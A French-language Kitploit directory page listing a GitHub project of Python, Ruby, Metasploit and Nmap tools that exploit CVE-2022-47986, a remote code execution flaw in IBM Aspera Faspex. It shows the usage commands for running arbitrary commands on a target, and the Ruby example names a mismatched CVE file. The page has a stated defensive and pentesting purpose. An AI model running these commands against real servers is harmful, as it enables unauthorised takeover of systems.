Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/mauricelambert/cve-2022-47986
Frameworks d'ExploitationExploitationExploitation d'Applications Web
GitHubmauricelambert/cve-2022-47986

CVE-2022-47986

CVE-2022-47986 : modules Python, Ruby, NMAP et Metasploit pour exploiter la vulnérabilité.

Voir le dépôt
212il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-47986

Pourquoi

Cette vulnérabilité est exploitée activement. IceFire utilise cette vulnérabilité pour déployer le ransomware sur les systèmes ciblés. Je souhaite aider les équipes SOC/Blue à identifier les systèmes impactés et les équipes Pentesters/Red à l'exploiter et à la signaler.

Description

Je propose des scripts en Python et Ruby purs, des modules Metasploit et Nmap pour exploiter la vulnérabilité qui provoque une RCE (Exécution de code à distance) sur IBM Aspera Faspex à partir d'une désérialisation YAML.

Exploitation : RCE (Exécution de code à distance)

Python

root@kitploit:~
python3 CVE-2022-47986.py <target> <command>
# OR
chmod u+x CVE-2022-47986.py
./CVE-2022-47986.py https://aspera.faspax.local id

Ruby

root@kitploit:~
ruby CVE-2021-31166.rb
ruby CVE-2021-31166.rb <hostname> -c <command>
ruby CVE-2021-31166.rb aspera.faspax.local -c id

Metasploit

root@kitploit:~
msf6 > use exploit/linux/http/ibm_aspera_faspex_rce_yaml_deserialization 
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set RHOST 10.10.10.10
RHOST => 10.10.10.10
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set LHOST 192.168.77.139
LHOST => 192.168.77.139
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > exploit

Nmap

root@kitploit:~
nmap -p 443 --script ibm-aspera-faspex-rce 172.17.0.2
nmap -p 443 --script ibm-aspera-faspex-rce --script-args "command=id" 172.17.0.2

Sources

  • IBM
  • nvd.nist.gov
  • Blog - Exploit
  • thehackernews - exploité par icefire
  • thehackernews - catalogue CISA KEV

Licence

Sous licence GPL, version 3.

Télécharger l’outil